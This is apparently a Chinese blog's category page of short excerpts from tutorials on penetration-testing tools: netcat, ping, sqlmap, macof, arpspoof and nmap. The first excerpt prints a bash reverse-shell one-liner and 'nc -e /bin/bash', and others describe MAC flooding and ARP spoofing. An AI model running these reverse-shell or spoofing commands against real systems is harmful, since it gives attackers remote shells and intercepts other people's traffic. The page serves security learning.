随笔分类 - 工具备忘录
先从脚本小子做起
摘要:反弹shell一般利用在命令执行漏洞中 在Netcat的学习中我们学习了如何使用nc -e /bin/bash反弹shell 这里分享一些除了nc以外其他的反弹方式 Bash反弹shell bash -i >& /dev/tcp/IP地址/端口 0>&1 /dev/tcp,udp,host,port
阅读全文
摘要:NetCat瑞士军刀,网络中的瑞士军刀,短小而精悍,功能齐全。简称为nc 端口扫描 参数 作用 -v 扫描端口是否开放 -z 指定端口范围 -w 指定扫描时间 -u 指定udp端口 例如:查看172.16.1.80的21端口是否开启 nc -v 172.16.1.80 21 扫描172.16.1.8
阅读全文
摘要:主机发现工具 当我们加入一个网段时,不知道该网段主机存活的数量,首先我们要先进行主机存活发现 ping ping命令通常用户查看网络连接状态;得到服务器的IP地址,还有网络连接的延迟,另外可以通过TTL判断出目标的操作系统,在网上的服务器中,一般该值都被修改 在linux中,ping命令会一直进行p
阅读全文
摘要:sqlmap使用,简介请见官网sqlmap.org ##sqlmap的经典操作 | 参数 | 作用 | | | | | -u | 指定url | | -l/-r | 读取文件内容进行注入,例如burpsuite保存的数据包头 | | --batch | 默认会问我们有很多问题,让slqmap自动选择
阅读全文
摘要:###macof 目的:攻击交换机的路由表,实现网络信息嗅探 macof是dsniff中的一个小工具 概要:交换机中存在着一个记录着MAC地址的表,为了完成数据的快速转发,这个表有着自动学习机制,学习后可以直接向目标发送数据。利用这不断学习的机制,不断地发送MAC地址交给交换机,填满整个MAC表,此
阅读全文
摘要:###arpspoof arpspoof是dsniff下的一个ARP欺骗工具 大概原理: 两台主机HostA 和 HostB想要进行通信的流程,那么主机A将需要知道自己的ip,mac 以及主机B的ip, mac。但是主机B的mac地址主机A是不知道的,所以主机A如果将他自己的IP与子网掩码进行 &
阅读全文
摘要:nmap是一款主机发现、端口扫描、服务识别、漏洞扫描的一款强大的信息收集工具
阅读全文
